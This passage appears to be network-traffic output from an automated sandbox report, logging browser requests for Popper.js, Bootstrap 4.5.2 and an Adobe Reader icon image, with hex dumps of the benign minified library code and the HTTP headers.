                                                                                                2025-01-08 06:22:50 UTC1369INData Raw: 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 7d 66 75 6e 63 74 69 6f 6e 20 76 28 65 2c 74 2c 72 2c 70 29 7b 76 61 72 20 73 3d 34 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 34 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 34 5d 2c 64 3d 7b 74 6f 70 3a 30 2c 6c 65 66 74 3a 30 7d 2c 6c 3d 73 3f 45 28 65 29 3a 61 28 65 2c 69 28 74 29 29 3b 69 66 28 27 76 69 65 77 70 6f 72 74 27 3d 3d 3d 70 29 64 3d 77 28 6c 2c 73 29 3b 65 6c 73 65 7b 76 61 72 20 66 3b 27 73 63 72 6f 6c 6c 50 61 72 65 6e 74 27 3d 3d 3d 70 3f 28 66 3d 6e 28 6f 28 74 29 29 2c 27 42 4f 44 59 27 3d 3d 3d 66 2e 6e 6f 64 65 4e 61 6d 65 26 26 28 66 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74
                                                                                                Data Ascii: ment.documentElement}function v(e,t,r,p){var s=4<arguments.length&&void 0!==arguments[4]&&arguments[4],d={top:0,left:0},l=s?E(e):a(e,i(t));if('viewport'===p)d=w(l,s);else{var f;'scrollParent'===p?(f=n(o(t)),'BODY'===f.nodeName&&(f=e.ownerDocument.document
                                                                                                2025-01-08 06:22:50 UTC1369INData Raw: 3d 6e 3f 45 28 74 29 3a 61 28 74 2c 69 28 6f 29 29 3b 72 65 74 75 72 6e 20 62 28 6f 2c 72 2c 6e 29 7d 66 75 6e 63 74 69 6f 6e 20 53 28 65 29 7b 76 61 72 20 74 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 65 66 61 75 6c 74 56 69 65 77 2c 6f 3d 74 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 29 2c 6e 3d 70 61 72 73 65 46 6c 6f 61 74 28 6f 2e 6d 61 72 67 69 6e 54 6f 70 7c 7c 30 29 2b 70 61 72 73 65 46 6c 6f 61 74 28 6f 2e 6d 61 72 67 69 6e 42 6f 74 74 6f 6d 7c 7c 30 29 2c 69 3d 70 61 72 73 65 46 6c 6f 61 74 28 6f 2e 6d 61 72 67 69 6e 4c 65 66 74 7c 7c 30 29 2b 70 61 72 73 65 46 6c 6f 61 74 28 6f 2e 6d 61 72 67 69 6e 52 69 67 68 74 7c 7c 30 29 2c 72 3d 7b 77 69 64 74 68 3a 65 2e 6f 66 66 73 65 74 57 69 64 74 68 2b 69 2c 68 65 69 67 68 74
                                                                                                Data Ascii: =n?E(t):a(t,i(o));return b(o,r,n)}function S(e){var t=e.ownerDocument.defaultView,o=t.getComputedStyle(e),n=parseFloat(o.marginTop||0)+parseFloat(o.marginBottom||0),i=parseFloat(o.marginLeft||0)+parseFloat(o.marginRight||0),r={width:e.offsetWidth+i,height
                                                                                                2025-01-08 06:22:50 UTC1369INData Raw: 73 74 61 74 65 2c 74 68 69 73 2e 70 6f 70 70 65 72 2c 74 68 69 73 2e 72 65 66 65 72 65 6e 63 65 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 70 6f 73 69 74 69 6f 6e 46 69 78 65 64 29 2c 65 2e 70 6c 61 63 65 6d 65 6e 74 3d 4f 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 70 6c 61 63 65 6d 65 6e 74 2c 65 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 2c 74 68 69 73 2e 70 6f 70 70 65 72 2c 74 68 69 73 2e 72 65 66 65 72 65 6e 63 65 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 6d 6f 64 69 66 69 65 72 73 2e 66 6c 69 70 2e 62 6f 75 6e 64 61 72 69 65 73 45 6c 65 6d 65 6e 74 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 6d 6f 64 69 66 69 65 72 73 2e 66 6c 69 70 2e 70 61 64 64 69 6e 67 29 2c 65 2e 6f 72 69 67 69 6e 61 6c 50 6c 61 63 65 6d 65 6e 74 3d 65 2e 70 6c 61 63 65
                                                                                                Data Ascii: state,this.popper,this.reference,this.options.positionFixed),e.placement=O(this.options.placement,e.offsets.reference,this.popper,this.reference,this.options.modifiers.flip.boundariesElement,this.options.modifiers.flip.padding),e.originalPlacement=e.place
                                                                                                2025-01-08 06:22:50 UTC1369INData Raw: 2c 69 29 7b 76 61 72 20 72 3d 27 42 4f 44 59 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 2c 70 3d 72 3f 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 65 66 61 75 6c 74 56 69 65 77 3a 65 3b 70 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 2c 6f 2c 7b 70 61 73 73 69 76 65 3a 21 30 7d 29 2c 72 7c 7c 4d 28 6e 28 70 2e 70 61 72 65 6e 74 4e 6f 64 65 29 2c 74 2c 6f 2c 69 29 2c 69 2e 70 75 73 68 28 70 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 2c 74 2c 6f 2c 69 29 7b 6f 2e 75 70 64 61 74 65 42 6f 75 6e 64 3d 69 2c 41 28 65 29 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 72 65 73 69 7a 65 27 2c 6f 2e 75 70 64 61 74 65 42 6f 75 6e 64 2c 7b 70 61 73 73 69 76 65 3a 21 30 7d 29 3b 76 61 72 20 72 3d 6e 28 65 29 3b 72 65 74 75 72 6e 20 4d 28 72
                                                                                                Data Ascii: ,i){var r='BODY'===e.nodeName,p=r?e.ownerDocument.defaultView:e;p.addEventListener(t,o,{passive:!0}),r||M(n(p.parentNode),t,o,i),i.push(p)}function F(e,t,o,i){o.updateBound=i,A(e).addEventListener('resize',o.updateBound,{passive:!0});var r=n(e);return M(r
                                                                                                2025-01-08 06:22:50 UTC1369INData Raw: 70 3b 72 65 74 75 72 6e 7b 6c 65 66 74 3a 66 28 31 3d 3d 73 25 32 26 26 31 3d 3d 64 25 32 26 26 21 6c 26 26 74 3f 6e 2e 6c 65 66 74 2d 31 3a 6e 2e 6c 65 66 74 29 2c 74 6f 70 3a 6d 28 6e 2e 74 6f 70 29 2c 62 6f 74 74 6f 6d 3a 6d 28 6e 2e 62 6f 74 74 6f 6d 29 2c 72 69 67 68 74 3a 66 28 6e 2e 72 69 67 68 74 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 2c 74 2c 6f 29 7b 76 61 72 20 6e 3d 44 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6f 3d 65 2e 6e 61 6d 65 3b 72 65 74 75 72 6e 20 6f 3d 3d 3d 74 7d 29 2c 69 3d 21 21 6e 26 26 65 2e 73 6f 6d 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 6e 61 6d 65 3d 3d 3d 6f 26 26 65 2e 65 6e 61 62 6c 65 64 26 26 65 2e 6f 72 64 65 72 3c 6e 2e 6f 72 64 65 72 7d 29 3b 69 66 28 21 69 29 7b 76
                                                                                                Data Ascii: p;return{left:f(1==s%2&&1==d%2&&!l&&t?n.left-1:n.left),top:m(n.top),bottom:m(n.bottom),right:f(n.right)}}function K(e,t,o){var n=D(e,function(e){var o=e.name;return o===t}),i=!!n&&e.some(function(e){return e.name===o&&e.enabled&&e.order<n.order});if(!i){v
                                                                                                2025-01-08 06:22:50 UTC1369INData Raw: 70 5b 73 5d 2e 73 70 6c 69 74 28 64 29 5b 30 5d 5d 29 2c 5b 70 5b 73 5d 2e 73 70 6c 69 74 28 64 29 5b 31 5d 5d 2e 63 6f 6e 63 61 74 28 70 2e 73 6c 69 63 65 28 73 2b 31 29 29 5d 3b 72 65 74 75 72 6e 20 61 3d 61 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 76 61 72 20 69 3d 28 31 3d 3d 3d 6e 3f 21 72 3a 72 29 3f 27 68 65 69 67 68 74 27 3a 27 77 69 64 74 68 27 2c 70 3d 21 31 3b 72 65 74 75 72 6e 20 65 2e 72 65 64 75 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 27 27 3d 3d 3d 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 26 26 2d 31 21 3d 3d 5b 27 2b 27 2c 27 2d 27 5d 2e 69 6e 64 65 78 4f 66 28 74 29 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 3d 74 2c 70 3d 21 30 2c 65 29 3a 70 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 2b 3d
                                                                                                Data Ascii: p[s].split(d)[0]]),[p[s].split(d)[1]].concat(p.slice(s+1))];return a=a.map(function(e,n){var i=(1===n?!r:r)?'height':'width',p=!1;return e.reduce(function(e,t){return''===e[e.length-1]&&-1!==['+','-'].indexOf(t)?(e[e.length-1]=t,p=!0,e):p?(e[e.length-1]+=


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                5192.168.2.449760104.18.10.2074434548C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 06:22:50 UTC382OUTGET /bootstrap/4.5.2/js/bootstrap.min.js HTTP/1.1
                                                                                                Host: maxcdn.bootstrapcdn.com
                                                                                                Connection: keep-alive
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept: */*
                                                                                                Sec-Fetch-Site: none
                                                                                                Sec-Fetch-Mode: cors
                                                                                                Sec-Fetch-Dest: empty
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 06:22:50 UTC966INHTTP/1.1 200 OK
                                                                                                Date: Wed, 08 Jan 2025 06:22:50 GMT
                                                                                                Content-Type: application/javascript; charset=utf-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CDN-PullZone: 252412
                                                                                                CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                                                                                                CDN-RequestCountryCode: US
                                                                                                Vary: Accept-Encoding
                                                                                                Access-Control-Allow-Origin: *
                                                                                                Cache-Control: public, max-age=31919000
                                                                                                ETag: W/"02d223393e00c273efdcb1ade8f4f8b1"
                                                                                                Last-Modified: Mon, 25 Jan 2021 22:04:11 GMT
                                                                                                CDN-ProxyVer: 1.07
                                                                                                CDN-RequestPullSuccess: True
                                                                                                CDN-RequestPullCode: 200
                                                                                                CDN-CachedAt: 12/15/2024 14:03:42
                                                                                                CDN-EdgeStorageId: 1236
                                                                                                timing-allow-origin: *
                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                X-Content-Type-Options: nosniff
                                                                                                CDN-Status: 200
                                                                                                CDN-RequestTime: 0
                                                                                                CDN-RequestId: c9cbd9b9712b24ea9ff50d77261bcc72
                                                                                                CDN-Cache: HIT
                                                                                                CF-Cache-Status: HIT
                                                                                                Age: 929255
                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8fea186efb164249-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2025-01-08 06:22:50 UTC403INData Raw: 37 62 65 64 0d 0a 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 35 2e 32 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 30 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c
                                                                                                Data Ascii: 7bed/*! * Bootstrap v4.5.2 (https://getbootstrap.com/) * Copyright 2011-2020 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE) */!function(t,
                                                                                                2025-01-08 06:22:50 UTC1369INData Raw: 6e 65 28 5b 22 65 78 70 6f 72 74 73 22 2c 22 6a 71 75 65 72 79 22 2c 22 70 6f 70 70 65 72 2e 6a 73 22 5d 2c 65 29 3a 65 28 28 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 7c 7c 73 65 6c 66 29 2e 62 6f 6f 74 73 74 72 61 70 3d 7b 7d 2c 74 2e 6a 51 75 65 72 79 2c 74 2e 50 6f 70 70 65 72 29 7d 28 74 68 69 73 2c 28 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 69 3d 65 5b 6e 5d 3b 69 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 69 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 69 2e 63 6f 6e 66 69
                                                                                                Data Ascii: ne(["exports","jquery","popper.js"],e):e((t="undefined"!=typeof globalThis?globalThis:t||self).bootstrap={},t.jQuery,t.Popper)}(this,(function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.confi
                                                                                                2025-01-08 06:22:50 UTC1369INData Raw: 61 74 28 69 29 3b 72 65 74 75 72 6e 20 6f 7c 7c 73 3f 28 6e 3d 6e 2e 73 70 6c 69 74 28 22 2c 22 29 5b 30 5d 2c 69 3d 69 2e 73 70 6c 69 74 28 22 2c 22 29 5b 30 5d 2c 31 65 33 2a 28 70 61 72 73 65 46 6c 6f 61 74 28 6e 29 2b 70 61 72 73 65 46 6c 6f 61 74 28 69 29 29 29 3a 30 7d 2c 72 65 66 6c 6f 77 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 2e 6f 66 66 73 65 74 48 65 69 67 68 74 7d 2c 74 72 69 67 67 65 72 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 65 28 74 29 2e 74 72 69 67 67 65 72 28 22 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 29 7d 2c 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 28 22 74 72 61 6e 73 69 74
                                                                                                Data Ascii: at(i);return o||s?(n=n.split(",")[0],i=i.split(",")[0],1e3*(parseFloat(n)+parseFloat(i))):0},reflow:function(t){return t.offsetHeight},triggerTransitionEnd:function(t){e(t).trigger("transitionend")},supportsTransitionEnd:function(){return Boolean("transit
                                                                                                2025-01-08 06:22:50 UTC1369INData Raw: 73 70 65 63 69 61 6c 5b 61 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 5d 3d 7b 62 69 6e 64 54 79 70 65 3a 22 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 2c 64 65 6c 65 67 61 74 65 54 79 70 65 3a 22 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 2c 68 61 6e 64 6c 65 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 65 28 74 2e 74 61 72 67 65 74 29 2e 69 73 28 74 68 69 73 29 29 72 65 74 75 72 6e 20 74 2e 68 61 6e 64 6c 65 4f 62 6a 2e 68 61 6e 64 6c 65 72 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 7d 3b 76 61 72 20 6c 3d 22 61 6c 65 72 74 22 2c 63 3d 65 2e 66 6e 5b 6c 5d 2c 68 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 3d 74 7d 76 61 72 20 6e 3d 74 2e 70 72 6f 74 6f
                                                                                                Data Ascii: special[a.TRANSITION_END]={bindType:"transitionend",delegateType:"transitionend",handle:function(t){if(e(t.target).is(this))return t.handleObj.handler.apply(this,arguments)}};var l="alert",c=e.fn[l],h=function(){function t(t){this._element=t}var n=t.proto
                                                                                                2025-01-08 06:22:50 UTC1369INData Raw: 32 22 7d 7d 5d 29 2c 74 7d 28 29 3b 65 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 22 63 6c 69 63 6b 2e 62 73 2e 61 6c 65 72 74 2e 64 61 74 61 2d 61 70 69 22 2c 27 5b 64 61 74 61 2d 64 69 73 6d 69 73 73 3d 22 61 6c 65 72 74 22 5d 27 2c 68 2e 5f 68 61 6e 64 6c 65 44 69 73 6d 69 73 73 28 6e 65 77 20 68 29 29 2c 65 2e 66 6e 5b 6c 5d 3d 68 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 65 2e 66 6e 5b 6c 5d 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 68 2c 65 2e 66 6e 5b 6c 5d 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 2e 66 6e 5b 6c 5d 3d 63 2c 68 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 7d 3b 76 61 72 20 75 3d 65 2e 66 6e 2e 62 75 74 74 6f 6e 2c 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74
                                                                                                Data Ascii: 2"}}]),t}();e(document).on("click.bs.alert.data-api",'[data-dismiss="alert"]',h._handleDismiss(new h)),e.fn[l]=h._jQueryInterface,e.fn[l].Constructor=h,e.fn[l].noConflict=function(){return e.fn[l]=c,h._jQueryInterface};var u=e.fn.button,d=function(){funct
                                                                                                2025-01-08 06:22:50 UTC1369INData Raw: 29 7b 76 61 72 20 6e 3d 74 2e 74 61 72 67 65 74 2c 69 3d 6e 3b 69 66 28 65 28 6e 29 2e 68 61 73 43 6c 61 73 73 28 22 62 74 6e 22 29 7c 7c 28 6e 3d 65 28 6e 29 2e 63 6c 6f 73 65 73 74 28 22 2e 62 74 6e 22 29 5b 30 5d 29 2c 21 6e 7c 7c 6e 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 64 69 73 61 62 6c 65 64 22 29 29 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 65 6c 73 65 7b 76 61 72 20 6f 3d 6e 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 27 69 6e 70 75 74 3a 6e 6f 74 28 5b 74 79 70 65 3d 22 68 69 64 64 65 6e 22 5d 29 27 29 3b 69 66 28 6f 26 26 28 6f 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 6f 2e 63 6c 61
                                                                                                Data Ascii: ){var n=t.target,i=n;if(e(n).hasClass("btn")||(n=e(n).closest(".btn")[0]),!n||n.hasAttribute("disabled")||n.classList.contains("disabled"))t.preventDefault();else{var o=n.querySelector('input:not([type="hidden"])');if(o&&(o.hasAttribute("disabled")||o.cla
                                                                                                2025-01-08 06:22:50 UTC1369INData Raw: 22 28 6e 75 6d 62 65 72 7c 62 6f 6f 6c 65 61 6e 29 22 2c 6b 65 79 62 6f 61 72 64 3a 22 62 6f 6f 6c 65 61 6e 22 2c 73 6c 69 64 65 3a 22 28 62 6f 6f 6c 65 61 6e 7c 73 74 72 69 6e 67 29 22 2c 70 61 75 73 65 3a 22 28 73 74 72 69 6e 67 7c 62 6f 6f 6c 65 61 6e 29 22 2c 77 72 61 70 3a 22 62 6f 6f 6c 65 61 6e 22 2c 74 6f 75 63 68 3a 22 62 6f 6f 6c 65 61 6e 22 7d 2c 76 3d 7b 54 4f 55 43 48 3a 22 74 6f 75 63 68 22 2c 50 45 4e 3a 22 70 65 6e 22 7d 2c 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 2c 65 29 7b 74 68 69 73 2e 5f 69 74 65 6d 73 3d 6e 75 6c 6c 2c 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 3d 6e 75 6c 6c 2c 74 68 69 73 2e 5f 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 3d 6e 75 6c 6c 2c 74 68 69 73 2e 5f 69 73 50 61 75 73 65 64 3d 21
                                                                                                Data Ascii: "(number|boolean)",keyboard:"boolean",slide:"(boolean|string)",pause:"(string|boolean)",wrap:"boolean",touch:"boolean"},v={TOUCH:"touch",PEN:"pen"},b=function(){function t(t,e){this._items=null,this._interval=null,this._activeElement=null,this._isPaused=!
                                                                                                2025-01-08 06:22:50 UTC1369INData Raw: 69 62 6c 65 3a 74 68 69 73 2e 6e 65 78 74 29 2e 62 69 6e 64 28 74 68 69 73 29 2c 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 69 6e 74 65 72 76 61 6c 29 29 7d 2c 6e 2e 74 6f 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 74 68 69 73 3b 74 68 69 73 2e 5f 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 3d 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 61 63 74 69 76 65 2e 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 22 29 3b 76 61 72 20 69 3d 74 68 69 73 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 28 74 68 69 73 2e 5f 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 29 3b 69 66 28 21 28 74 3e 74 68 69 73 2e 5f 69 74 65 6d 73 2e 6c 65 6e 67 74 68 2d 31 7c 7c 74 3c 30 29 29 69 66 28 74 68 69 73 2e 5f 69 73 53 6c 69 64 69 6e 67 29 65 28 74
                                                                                                Data Ascii: ible:this.next).bind(this),this._config.interval))},n.to=function(t){var n=this;this._activeElement=this._element.querySelector(".active.carousel-item");var i=this._getItemIndex(this._activeElement);if(!(t>this._items.length-1||t<0))if(this._isSliding)e(t
                                                                                                2025-01-08 06:22:50 UTC1369INData Raw: 7b 74 2e 5f 70 6f 69 6e 74 65 72 45 76 65 6e 74 26 26 76 5b 65 2e 6f 72 69 67 69 6e 61 6c 45 76 65 6e 74 2e 70 6f 69 6e 74 65 72 54 79 70 65 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 5d 3f 74 2e 74 6f 75 63 68 53 74 61 72 74 58 3d 65 2e 6f 72 69 67 69 6e 61 6c 45 76 65 6e 74 2e 63 6c 69 65 6e 74 58 3a 74 2e 5f 70 6f 69 6e 74 65 72 45 76 65 6e 74 7c 7c 28 74 2e 74 6f 75 63 68 53 74 61 72 74 58 3d 65 2e 6f 72 69 67 69 6e 61 6c 45 76 65 6e 74 2e 74 6f 75 63 68 65 73 5b 30 5d 2e 63 6c 69 65 6e 74 58 29 7d 2c 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 2e 5f 70 6f 69 6e 74 65 72 45 76 65 6e 74 26 26 76 5b 65 2e 6f 72 69 67 69 6e 61 6c 45 76 65 6e 74 2e 70 6f 69 6e 74 65 72 54 79 70 65 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 5d 26 26 28 74 2e 74 6f 75 63 68
                                                                                                Data Ascii: {t._pointerEvent&&v[e.originalEvent.pointerType.toUpperCase()]?t.touchStartX=e.originalEvent.clientX:t._pointerEvent||(t.touchStartX=e.originalEvent.touches[0].clientX)},i=function(e){t._pointerEvent&&v[e.originalEvent.pointerType.toUpperCase()]&&(t.touch
                                                                                                2025-01-08 06:22:50 UTC1369INData Raw: 65 6d 49 6e 64 65 78 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 69 74 65 6d 73 3d 74 26 26 74 2e 70 61 72 65 6e 74 4e 6f 64 65 3f 5b 5d 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 74 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 2e 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 22 29 29 3a 5b 5d 2c 74 68 69 73 2e 5f 69 74 65 6d 73 2e 69 6e 64 65 78 4f 66 28 74 29 7d 2c 6e 2e 5f 67 65 74 49 74 65 6d 42 79 44 69 72 65 63 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 3d 22 6e 65 78 74 22 3d 3d 3d 74 2c 69 3d 22 70 72 65 76 22 3d 3d 3d 74 2c 6f 3d 74 68 69 73 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 28 65 29 2c 73 3d 74 68 69 73 2e 5f 69 74 65 6d 73 2e 6c 65 6e 67 74 68
                                                                                                Data Ascii: emIndex=function(t){return this._items=t&&t.parentNode?[].slice.call(t.parentNode.querySelectorAll(".carousel-item")):[],this._items.indexOf(t)},n._getItemByDirection=function(t,e){var n="next"===t,i="prev"===t,o=this._getItemIndex(e),s=this._items.length


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                6192.168.2.44976165.9.66.174434548C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 06:22:51 UTC619OUTGET /wp-content/uploads/sites/451/2018/08/Apps-Adobe-Acrobat-Reader-Metro-icon.png HTTP/1.1
                                                                                                Host: help.lafayette.edu
                                                                                                Connection: keep-alive
                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                sec-ch-ua-mobile: ?0
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                Sec-Fetch-Site: cross-site
                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                Sec-Fetch-Dest: image
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 06:22:51 UTC537INHTTP/1.1 200 OK
                                                                                                Content-Type: image/png
                                                                                                Content-Length: 10352
                                                                                                Connection: close
                                                                                                Date: Wed, 08 Jan 2025 06:22:51 GMT
                                                                                                Server: Apache/2.4.62 (Debian)
                                                                                                Last-Modified: Fri, 12 Jun 2020 19:04:43 GMT
                                                                                                ETag: "2870-5a7e7bffd37b7"
                                                                                                Accept-Ranges: bytes
                                                                                                Expires: Thu, 08 Jan 2026 06:22:51 GMT
                                                                                                Cache-Control: public, max-age=84600, immutable
                                                                                                X-Cache: Miss from cloudfront
                                                                                                Via: 1.1 4f114016fe4d6c05531b0486ec2868be.cloudfront.net (CloudFront)
                                                                                                X-Amz-Cf-Pop: FRA56-C1
                                                                                                X-Amz-Cf-Id: VZ67VOONiKvxXdOoVihETYETpgWW4Nf82rYtUmkATjdFet7c7CF8sg==
